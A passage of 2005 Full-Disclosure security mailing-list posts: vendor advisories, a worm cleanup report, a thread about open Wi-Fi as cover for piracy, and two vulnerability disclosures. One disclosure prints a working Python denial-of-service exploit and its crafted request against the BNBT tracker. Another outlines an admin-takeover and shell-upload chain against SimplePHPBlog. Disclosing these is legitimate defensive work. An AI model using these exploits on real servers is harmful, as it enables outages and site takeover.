10.0/RPMS/apache2-mod_mem_cache-2.0.48-6.10.100mdk.i586.rpm c2ecd41c3008aaab2a5fc7c3b8110e8d 10.0/RPMS/apache2-mod_proxy-2.0.48-6.10.100mdk.i586.rpm bcf9a227556770e2a4eabcd1d6a0fa75 10.0/RPMS/apache2-mod_ssl-2.0.48-6.10.100mdk.i586.rpm 7d75dd812c46a815af24cae789298784 10.0/RPMS/apache2-modules-2.0.48-6.10.100mdk.i586.rpm d590f67cfd17c4b59d056d8d3a3f21ec 10.0/RPMS/apache2-source-2.0.48-6.10.100mdk.i586.rpm 723c8e5b221a63d28b91691200a549a2 10.0/RPMS/libapr0-2.0.48-6.10.100mdk.i586.rpm 427b5be76093a411ed79a1b26418b4f1 10.0/SRPMS/apache2-2.0.48-6.10.100mdk.src.rpm Mandrakelinux 10.0/AMD64: 48c6f8b3783dce36696d75c5fe063892 amd64/10.0/RPMS/apache2-2.0.48-6.10.100mdk.amd64.rpm 24a5d0d2312d241a445d6dc0873894f4 amd64/10.0/RPMS/apache2-common-2.0.48-6.10.100mdk.amd64.rpm b4f316e8e38729d80a1cb544f6fda84d amd64/10.0/RPMS/apache2-devel-2.0.48-6.10.100mdk.amd64.rpm ff7075e8a5027ae1fcf6a4a9d00d32a7 amd64/10.0/RPMS/apache2-manual-2.0.48-6.10.100mdk.amd64.rpm 1835dababf1adbf47fbaa856967d13ee amd64/10.0/RPMS/apache2-mod_cache-2.0.48-6.10.100mdk.amd64.rpm f8c3af9e481b7990911e523a266b43cb amd64/10.0/RPMS/apache2-mod_dav-2.0.48-6.10.100mdk.amd64.rpm 56adf6d95827036fd9b4978ba998d19c amd64/10.0/RPMS/apache2-mod_deflate-2.0.48-6.10.100mdk.amd64.rpm 1d0c37546852ddb316ed1087ad436f45 amd64/10.0/RPMS/apache2-mod_disk_cache-2.0.48-6.10.100mdk.amd64.rpm 5484d540fe7f7a161ed0c32a9ed61127 amd64/10.0/RPMS/apache2-mod_file_cache-2.0.48-6.10.100mdk.amd64.rpm 1013ef5cdfed64f359494f01b0bbecb9 amd64/10.0/RPMS/apache2-mod_ldap-2.0.48-6.10.100mdk.amd64.rpm 74188fb21ef2d83c28fcbfbfca142e0a amd64/10.0/RPMS/apache2-mod_mem_cache-2.0.48-6.10.100mdk.amd64.rpm 32fcde1183be227e9580b653d5866538 amd64/10.0/RPMS/apache2-mod_proxy-2.0.48-6.10.100mdk.amd64.rpm 4869bd9b9add97bba229abd258dba421 amd64/10.0/RPMS/apache2-mod_ssl-2.0.48-6.10.100mdk.amd64.rpm 930c24a0258d3c4d11f1abea2544ce9d amd64/10.0/RPMS/apache2-modules-2.0.48-6.10.100mdk.amd64.rpm 45e8ee1b64fc88658332406cdd0eaf83 amd64/10.0/RPMS/apache2-source-2.0.48-6.10.100mdk.amd64.rpm fb46e03fa056d9b63498aa66b7f254cb amd64/10.0/RPMS/lib64apr0-2.0.48-6.10.100mdk.amd64.rpm 427b5be76093a411ed79a1b26418b4f1 amd64/10.0/SRPMS/apache2-2.0.48-6.10.100mdk.src.rpm Multi Network Firewall 2.0: ea96befbb54a665d1cf0c11dcf1514bf mnf/2.0/RPMS/apache2-2.0.48-6.10.M20mdk.i586.rpm afeca22641361fb5631e49f444de8ff1 mnf/2.0/RPMS/apache2-common-2.0.48-6.10.M20mdk.i586.rpm 6a50b170156421073348fb2338328f57 mnf/2.0/RPMS/apache2-mod_cache-2.0.48-6.10.M20mdk.i586.rpm d1c01d727d5b052bfa7954f51721e330 mnf/2.0/RPMS/apache2-mod_proxy-2.0.48-6.10.M20mdk.i586.rpm 1579d72fed28c50c975ffa3a379d9e7e
[Full-disclosure] SimplePHPBlog Arbitrary File Deletion and Sample Exploit
SimplePHPBlog has a vulnerability in its comment_delete_cgi.php. The PHP script allows for the arbitrary deletion of files. Please see following link for a perl script to demonstrate the exploit: http://www.ftusecurity.com/pub/sphpblog_vulns (Please add .pl extension as my ISP server preprocesses the file if it is .pl or txt.) This vulnerability, in combination with the fact that the installation scripts are left on the server after installation, allows an arbitrary user to reset the admin password to one of the attacker's choosing. The script demonstrates the ability to delete files, reset the admin password to the attacker's choosing and upload files (including a command prompt). The exploit is for educational purposes only. To prevent this exploit change the line in comment_delete_cgi.php from $logged_in = logged_in( false, true ); to $logged_in = logged_in( true, true ); Sincerely, 'ken'@FTU Kenneth F. Belva, CISSP http://www.ftusecurity.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Wireless Networking Excuse
Has anyone examined the idea of using a public hotspot on a local network to shield BSA, RIAA, MPAA lawsuits? Since the tracking stops at the public facing IP, who is to say it wasn't some freeloader downloading the warez? Just looking for some feedback on this one... Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Xcon2005 papers released (alert7)
finally it's online. :-) btw, got audio/video files? i suppose you recorded it all, right? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: The Wireless Networking Excuse
On 8/29/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Has anyone examined the idea of using a public hotspot on a local network to shield BSA, RIAA, MPAA lawsuits? Since the tracking stops at the public facing IP, who is to say it wasn't some freeloader downloading the warez? Just looking for some feedback on this one... It is an interesting point. I have thought about it myself in the context of having my personal access point open to the public and if someone hopped on and downloaded something. Would I be resposible if they tracked it back to my AP? I am not a legal expert by any means but I would think it would be comparable to someone using my phone to make a harasing call. Although I am not sure how that would be ruled either. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] BNBT EasyTracker Remote Denial of Service Vulnerability
BNBT EasyTracker Remote Denial of Service Vulnerability by Sowhat Last Update:2005.08.30 http://secway.org/advisory/AD20050830.txt Vendor: http://bnbteasytracker.sourceforge.net/ Product Affected: 7.7r3.2004.10.27 and below Overview: BNBT was written by Trevor Hogan. BNBT is a complete port of the original Python BitTorrent tracker to C++ for speedand efficiency. BNBT also offers many additional featuresbeyond the original Python BitTorrent tracker, plus it's easy to use and customizable. BNBT is covered under the GNULesser General Public License (LGPL). A Denial of Service vulnerability exists within BNBT whichallows for an attacker to cause the BNBT to stop responding. Details: A specifically crafted HTTP request will cause the BNBT Server stop responding. Sending a request like GET /index.htm HTTP/1.1\r\n:\r\n\r\nwill reproduce the problem. It seems that the bug is locatedin client.cpp, //grab headers section. And it is somethinglike 1-2 = -1 and similar to memcpy(-1) ? // grab headers string :: size_type iNewLine = m_strReceiveBuf.find( \r\n );string :: size_type iDoubleNewLine = m_strReceiveBuf.find( \r\n\r\n ); strTemp = m_strReceiveBuf.substr( iNewLine + strlen( \r\n ), iDoubleNewLine - iNewLine - strlen( \r\n ) ); while( 1 ){string :: size_type iSplit = strTemp.find( : );string :: size_type iEnd = strTemp.find( \r\n ); if( iSplit == string :: npos ){UTIL_LogPrint( client warning - malformed HTTP request (bad header)\n ); break;} string strKey = strTemp.substr( 0, iSplit );string strValue = strTemp.substr( iSplit + strlen( : ), iEnd - iSplit - strlen( \r\n ) );//Bug here ?? rqst.mapHeaders.insert( pairstring, string( strKey, strValue ) ); strTemp = strTemp.substr( iEnd + strlen( \r\n ) ); if( iEnd == string :: npos )break;} However, I am not quite sure about that and it seems thatit is only a D.O.S so I havnt deep into it. Exploit: //BNBTDOS.py# BNBT EasyTracker Remote D.O.S Exploit# Bug discoverd and coded by Sowhat# http://secway.org # Version 7.7r3.2004.10.27 and below# the BNBT project: http://bnbteasytracker.sourceforge.net/import sysimport stringimport socket if (len(sys.argv) != 2):print \nUsage: + sys.argv[0] + TargetIP\nprint ##print # # print # BNBT EasyTracker Remote D.O.S Exploit #print # Bug discoverd and coded by Sowhat #print # http://secway.org #print ##sys.exit(0) host = sys.argv[1]port = 6969 payload = GET /index.htm HTTP/1.1\r\n:\r\n\r\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((host,port))s.send(payload) WORKAROUND: No WORKAROUND this time.plz check the vendor's website for updateMaybe there will be a patch later (?) Vendor Response: 2005.08.22 Vendor notified via Webform,no email found 2005.08.30 Vendor no response. Advisory Released Life is like a bug, Do you know how to exploit it ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: The Wireless Networking Excuse
On Mon, 29 Aug 2005, womber wrote: On 8/29/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Has anyone examined the idea of using a public hotspot on a local network to shield BSA, RIAA, MPAA lawsuits? Since the tracking stops at the public facing IP, who is to say it wasn't some freeloader downloading the warez? Just looking for some feedback on this one... It is an interesting point. I have thought about it myself in the context of having my personal access point open to the public and if someone hopped on and downloaded something. Would I be resposible if they tracked it back to my AP? I am not a legal expert by any means but I would think it would be comparable to someone using my phone to make a harasing call. Although I am not sure how that would be ruled either. I am not an attorney and this is not legal advice -- I have heard that there is case law supporting that unsecured wireless communication are public domain, just as wireless telephone conversations are not considered privileged by the Court. If this is the case, then anyone with default wireless router settings are a legal public hotspot. If there is an attorney on this list I would love to read the actual opinion of this (these) alleged case(s). Currently, this information must be considered hearsay. In the Portland area we have so many WAPs which are open that all we need to do is create wireless-bridging/routing points to route packets between overlapping wireless networks. In many cases, this wireless MAN would be faster point-to-point than going out the Internet and back to its destination. Since this MAN would be behind routers for the most part, bring your own firewall ;) -- Does anyone know of decent (cheap) low-power microcontrollers having 802.11 with I/O 5Mbit which support Linux? -Eric -- Eric Wheeler Vice President National Security Concepts, Inc. PO Box 3567 Tualatin, OR 97062 http://www.nsci.us/ Voice: (503) 293-7656 Fax: (503) 885-0770 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: The Wireless Networking Excuse
On Mon, 29 Aug 2005 21:33:06 CDT, womber said: It is an interesting point. I have thought about it myself in the context of having my personal access point open to the public and if someone hopped on and downloaded something. Would I be resposible if they tracked it back to my AP? Anybody who tries the The giant pink iguana with a pringle's can did it defense had better make damned sure they can prove in a court of law that there was indeed a giant pink iguana. And at that point, you may have to explain why you knowingly provided access to allow the commission of a crime - aiding and abetting isn't someplace you want to be.. pgp4SXictXjAu.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] No one else seeing the new MS05-039 worm yet?
This has been going around since early Monday afternoon. Symantec and other AV vendors have had code since then, and no details STILL. I guess one can call it the Katrina worm until something better comes along. Details: - Exploits MS05-039, but also MS04-011 and MS03-026. - Scans on port 5000 and 135. - On workstations opens up range of listening ports above 1024, visible with netstat -a. - Creates 40K svc.exe and several randomly named LARGE .exe files in: C:\WINNT directory. - Sticks a long line of hosts resolving to broadcast address in: C:\WINNT\System32\Drivers\etc in hosts file. - Adds reg key(s) under: HKLM\Software\Microsoft\Windows\CurrentVersion\Run which are those random .exe file names mentioned above. - May create svc.exe and exe.tmp reg keys under: HKCU\Software\Microsoft\Internet Explorer\Explorer Bars\(machine key)\ FilesNamedMRU (may be unrelated, not generally found on infected box). - Prevents killing processes via Task Manager (all processes backed by gray color, clicking individual processes does nothing). - One can use other utilities to kill running malware processes. - Symantec may report as [EMAIL PROTECTED] and/or W32.HLLW.Nebiwo. Cleanup: - Backup registry. - Delete malware-related reg keys as noted. - Delete malware-related files. - Re-check registry, as executables may enter new values before all cleanup actions complete. - Edit hosts file, removing added data and saving afterward. - Empty Recycle Bin. - Patch infected machine. - Reboot. - Verify that symptoms are gone. I've not had time to decompile code to dig out other details, but cleanup routine seems sufficient for most part. Have had working routine since early afternoon, and expected details from vendors long before now. Peace, Vic ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 790-1] New phpldapadmin packages fix unauthorised access
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 790-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze August 30th, 2005 http://www.debian.org/security/faq - -- Package: phpldapadmin Vulnerability : programming error Problem-Type : remote Debian-specific: no CVE ID : CAN-2005-2654 Debian Bug : 322423 Alexander Gerasiov discovered that phpldapadmin, a web based interface for administering LDAP servers, allows anybody to access the LDAP server anonymously, even if this is disabled in the configuration with the disable_anon_bind statement. The old stable distribution (woody) is not vulnerable to this problem. For the stable distribution (sarge) this problem has been fixed in version 0.9.5-3sarge1. For the unstable distribution (sid) this problem has been fixed in version 0.9.6c-5. We recommend that you upgrade your phpldapadmin package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5-3sarge2.dsc Size/MD5 checksum: 619 d6da0a97614965ba396e3ca4079ddabb http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5-3sarge2.diff.gz Size/MD5 checksum:11564 543a7a99fb997976bbdaa51056e85d4f http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5.orig.tar.gz Size/MD5 checksum: 617707 fb0669d4c4b8857387aef2630de8 Architecture independent components: http://security.debian.org/pool/updates/main/p/phpldapadmin/phpldapadmin_0.9.5-3sarge2_all.deb Size/MD5 checksum: 616852 2ea5bc2d2f2eb0736f75cc8b48618842 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFDE+46W5ql+IAeqTIRAiKFAJwOCPrF4o0BIRdHFoNtdYV6NtaJpQCcCbps 5Yvs4Rgz+G4GWN3d2JPejEQ= =M+hK -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/